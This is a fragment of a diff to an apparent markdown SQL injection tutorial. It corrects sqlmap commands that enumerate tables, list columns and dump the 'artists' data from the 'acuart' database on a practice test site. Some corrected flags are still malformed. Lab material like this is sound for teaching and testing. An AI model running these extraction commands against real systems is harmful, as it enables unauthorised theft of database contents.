mumbai1/cyber/sqlenjection.md

 sudo su
-sqlmap-u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
+sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

 In figure 6b you can see that there are eight tables.
 8. Type the following command and press enter to list information about the column of a particular table, as shown in figure 7a

-sqlmap-u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -columns
+sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists -columns

 9. Type the following command and press enter to dump the data from the column, as shown in figure 8a

-sqlmap-u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists-C aname -dump
+sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T artists-C aname -dump

 figure 8a and 8b displays the output